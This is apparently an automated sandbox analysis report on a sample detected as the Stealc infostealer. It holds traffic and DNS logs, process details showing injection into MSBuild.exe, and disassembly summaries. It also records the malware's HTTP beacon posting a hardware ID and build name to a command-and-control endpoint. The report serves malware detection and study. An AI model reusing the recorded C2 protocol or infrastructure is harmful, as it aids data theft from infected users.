Oct 7, 2024 19:34:28.648135900 CEST	443	49739	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.648241043 CEST	49739	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.648293972 CEST	49739	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.648312092 CEST	443	49739	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.648648977 CEST	443	49735	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.648753881 CEST	443	49736	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.648801088 CEST	49740	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.648824930 CEST	443	49740	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.648883104 CEST	49740	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.648967028 CEST	49740	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.648967981 CEST	49741	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.648979902 CEST	443	49740	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.649010897 CEST	443	49741	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.649060965 CEST	49741	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.649151087 CEST	49741	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.649163008 CEST	443	49741	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.660367966 CEST	443	49738	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.660367966 CEST	443	49737	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.662421942 CEST	49742	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.662457943 CEST	443	49742	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.662472010 CEST	49743	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.662508011 CEST	443	49743	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.662528038 CEST	49742	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.662561893 CEST	49743	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.662720919 CEST	49743	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.662735939 CEST	443	49743	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.662760019 CEST	49742	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.662774086 CEST	443	49742	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.663367033 CEST	443	49739	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.664896965 CEST	49744	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.664932013 CEST	443	49744	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.665004969 CEST	49744	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.665154934 CEST	49744	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.665173054 CEST	443	49744	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.665256977 CEST	443	49740	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.665775061 CEST	443	49741	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.666703939 CEST	49745	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.666721106 CEST	443	49745	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.666789055 CEST	49745	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.666925907 CEST	49745	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.666940928 CEST	443	49745	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.667061090 CEST	49746	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.667069912 CEST	443	49746	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.667126894 CEST	49746	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.667298079 CEST	49746	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.667306900 CEST	443	49746	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.673858881 CEST	443	49743	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.674081087 CEST	49747	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.674122095 CEST	443	49747	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.674181938 CEST	49747	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.674200058 CEST	443	49742	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.674520969 CEST	49747	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.674525023 CEST	49748	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.674535990 CEST	443	49747	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.674561977 CEST	443	49748	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.674614906 CEST	49748	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.674725056 CEST	49748	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.674737930 CEST	443	49748	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.676372051 CEST	443	49744	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.676562071 CEST	49749	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.676587105 CEST	443	49749	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.676639080 CEST	49749	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.676752090 CEST	49749	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.676764965 CEST	443	49749	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.678018093 CEST	443	49745	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.678174019 CEST	49750	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.678188086 CEST	443	49750	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.678231955 CEST	49750	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.678636074 CEST	49750	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.678647995 CEST	443	49750	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.680228949 CEST	443	49746	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.680445910 CEST	49751	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.680483103 CEST	443	49751	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.680532932 CEST	49751	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.680864096 CEST	49751	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.680876970 CEST	443	49751	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.703609943 CEST	443	49748	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.705811977 CEST	443	49749	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.706873894 CEST	443	49750	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.707848072 CEST	443	49751	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:29.358508110 CEST	443	49747	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:29.358665943 CEST	49747	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:29.363126040 CEST	49747	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:29.363142014 CEST	443	49747	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:29.363594055 CEST	443	49747	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:29.373200893 CEST	49747	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:29.419398069 CEST	443	49747	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:29.477958918 CEST	443	49747	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:29.478032112 CEST	443	49747	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:29.478176117 CEST	49747	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:29.478471994 CEST	49747	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:29.478491068 CEST	443	49747	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:29.478502989 CEST	49747	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:29.478513956 CEST	443	49747	13.107.253.72	192.168.2.8

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 19:33:16.854921103 CEST	1.1.1.1	192.168.2.8	0x34d5	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 19:33:16.854921103 CEST	1.1.1.1	192.168.2.8	0x34d5	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 7, 2024 19:33:31.579916954 CEST	1.1.1.1	192.168.2.8	0x8c69	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 19:33:31.579916954 CEST	1.1.1.1	192.168.2.8	0x8c69	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 7, 2024 19:34:16.903925896 CEST	1.1.1.1	192.168.2.8	0x418	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 7, 2024 19:34:16.903925896 CEST	1.1.1.1	192.168.2.8	0x418	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 7, 2024 19:34:28.009830952 CEST	1.1.1.1	192.168.2.8	0x96e4	No error (0)	shed.dual-low.s-part-0032.t-0009.t-msedge.net	azurefd-t-fb-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 19:34:28.009830952 CEST	1.1.1.1	192.168.2.8	0x96e4	No error (0)	dual.s-part-0044.t-0009.fb-t-msedge.net	s-part-0044.t-0009.fb-t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 19:34:28.009830952 CEST	1.1.1.1	192.168.2.8	0x96e4	No error (0)	s-part-0044.t-0009.fb-t-msedge.net		13.107.253.72	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

62.204.41.150

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49707	62.204.41.150	80	2332	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 19:33:14.715749979 CEST	88	OUT	GET / HTTP/1.1 Host: 62.204.41.150 Connection: Keep-Alive Cache-Control: no-cache
Oct 7, 2024 19:33:15.399121046 CEST	203	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 17:33:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 7, 2024 19:33:15.403103113 CEST	419	OUT	POST /edd20096ecef326d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECF Host: 62.204.41.150 Content-Length: 219 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 46 35 45 32 34 46 39 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="hwid"EFF5E24F91144293944220------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="build"default6_doz------EHDAAECAEBKJKFHJKECF--
Oct 7, 2024 19:33:15.878268957 CEST	210	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 17:33:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Target ID:	0
Start time:	13:33:13
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\Aew8SXjXEb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Aew8SXjXEb.exe"
Imagebase:	0x620000
File size:	505'344 bytes
MD5 hash:	C89C82AB6576A83A2A32BBFFE44EF4D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:33:13
Start date:	07/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xd70000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:33:13
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 272
Imagebase:	0x910000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.1%
Total number of Nodes:	229
Total number of Limit Nodes:	3

Executed Functions

Function 00622021 Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 631
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(0069A6D8,?,00000040,?), ref: 00622738

Strings

a, xrefs: 00622296
S, xrefs: 0062206A
', xrefs: 00622718

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: '$S$a
API String ID: 544645111-1060379873
Opcode ID: 6f1daa091e7a208fe3655901d4e82f0afa595d1f9f7ba9b3c9f346e3c7a9c7b3
Instruction ID: d4db0bb55a3d3e7fb33eaddc1bbc563f22be1b8b6a143625c534513bf6ad243a
Opcode Fuzzy Hash: 6f1daa091e7a208fe3655901d4e82f0afa595d1f9f7ba9b3c9f346e3c7a9c7b3
Instruction Fuzzy Hash: CEF1F427934E3B16E7086439AC722F5954BD7AA370FD14333BE229B3F4E35909429A85

Function 00636368 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00638F1C,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0063639C
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00638F1C,?,?,00000000,?,00000000), ref: 006363BA

Strings

R[b, xrefs: 00636396

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: String
String ID: R[b
API String ID: 2568140703-1787471655
Opcode ID: 990d1bd3c8b432a52b711ae3c910f70538d3c1b30d078916b11978bed9ff866c
Instruction ID: 5b0905bf86d063a9b8cd7ad870e3f943bb88de4e25f4c9606f6cfdadc52248da
Opcode Fuzzy Hash: 990d1bd3c8b432a52b711ae3c910f70538d3c1b30d078916b11978bed9ff866c
Instruction Fuzzy Hash: F8F0763640016ABBCF126F90DC09EDE3F27EF497A0F059114FA196A120CB32D972AB94

Function 00638E2E Relevance: 4.7, APIs: 3, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__freea.LIBCMT ref: 00638FDD

Part of subcall function 00633A83: HeapAlloc.KERNEL32(00000000,0063A1AA,?,?,0063A1AA,00000220,?,?,?), ref: 00633AB5

__freea.LIBCMT ref: 00638FF2
__freea.LIBCMT ref: 00639002

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: __freea$AllocHeap
String ID:
API String ID: 85559729-0
Opcode ID: 772ea55a7f6a58bd2b611af7714b48a7e75eff22144aebe16be3f6138f602651
Instruction ID: e705dc3ca7c0b0d38ca5ca77249890c01c6ef9250ec84d90395a1090cb451114
Opcode Fuzzy Hash: 772ea55a7f6a58bd2b611af7714b48a7e75eff22144aebe16be3f6138f602651
Instruction Fuzzy Hash: 6C517C72600316AFEB25AF64CC81EEB3AABEB44790F15012DFD08D7251EA71CD5187E4

Function 0063A3A6 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00639ED6: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00639F01

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,0063A1ED,?,00000000,?,?,?), ref: 0063A407
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,0063A1ED,?,00000000,?,?,?), ref: 0063A449

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 601f5434413a7cbd45cee8d857fc84592c9c75f793a3eefdfc40e62d16fd2170
Instruction ID: 123f0b4dd3aa81c7a93633e445ba2a436dcee1a18f8eaeff3ee1a46ddcc525dc
Opcode Fuzzy Hash: 601f5434413a7cbd45cee8d857fc84592c9c75f793a3eefdfc40e62d16fd2170
Instruction Fuzzy Hash: A2512471A002458FDB21CFB5C8856EABBE7EF85310F14416ED0C28B352E7B89946DBD2

Function 00639FAA Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(E8458D00,?,0063A1F9,0063A1ED,00000000), ref: 00639FDC

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 51b2a6c4908ee125e7628effe40ad356afb1827f0b51d6850b0f2910d9891468
Instruction ID: b671dce29a1c8b1149b2a390ad5341b460049c59fba5940dad8089cb2ea507d5
Opcode Fuzzy Hash: 51b2a6c4908ee125e7628effe40ad356afb1827f0b51d6850b0f2910d9891468
Instruction Fuzzy Hash: 05517D719041589EDB218F68CC80AF67BBAEB56308F2405EDE0DAC7142C3759D46EF61

Non-executed Functions

Function 0067094F Relevance: 19.6, Strings: 11, Instructions: 5885COMMON

Download Yara Rule

Strings

-ms, xrefs: 0067199A
G>q, xrefs: 00670C20
7.?j, xrefs: 00670CCE
+4#, xrefs: 00671098
6"k~, xrefs: 006712F7
-]45, xrefs: 00670C92
h2=?, xrefs: 00671A71
2- #, xrefs: 00671899
8@[*, xrefs: 006713C4
hw^ , xrefs: 00671229
9]`V, xrefs: 0067166E

Memory Dump Source

Source File: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID:
String ID: +4#$-]45$-ms$2- #$6"k~$7.?j$8@[*$9]`V$G>q$h2=?$hw^
API String ID: 0-103661567
Opcode ID: 7901161aae9f9da5d229c51b76c7ce90f08aceb943cd7e8fa9e8ea12c19d518a
Instruction ID: 7278561a69c3953a9f61c3d9a86b6ce4d469d524c31ba5750c99991a8d1af1db
Opcode Fuzzy Hash: 7901161aae9f9da5d229c51b76c7ce90f08aceb943cd7e8fa9e8ea12c19d518a
Instruction Fuzzy Hash: 2483317241E7D61EC727CB308AB65A17F66FE136103198ACFC4C18F5B3C2549A1AE366

Function 0063C9E9 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0063CAF5
IsValidCodePage.KERNEL32(00000000), ref: 0063CB3E
IsValidLocale.KERNEL32(?,00000001), ref: 0063CB4D
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0063CB95
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0063CBB4

Strings

||d, xrefs: 0063CA4E

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID: ||d
API String ID: 415426439-1811930013
Opcode ID: 008daa0511afdd81eaf4e4e97e2406a1e41bad61c20bac3b96d3a441ec06f113
Instruction ID: 9cca1eec71b81a9293944e696f0df972e4ed842e1fe0c3ff2123d096d96291ae
Opcode Fuzzy Hash: 008daa0511afdd81eaf4e4e97e2406a1e41bad61c20bac3b96d3a441ec06f113
Instruction Fuzzy Hash: 32516E72A00219ABDB10DFA5DC46AEAB7BAFF09710F144469F911F7290E7709A04CBE5

Function 0063D39B Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0063D57F

Strings

1#QNAN, xrefs: 0063D4AE
1#INF, xrefs: 0063D4D1
1#IND, xrefs: 0063D4A0
1#SNAN, xrefs: 0063D4A7

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 02c98f535dc4d4497b3986de27da475f19f7fe4b5ed185c7709bbfdf8f807088
Instruction ID: 94c5dae543434d6c77e35d71dee383ccafc90829e89fb31addfbb955bce6823c
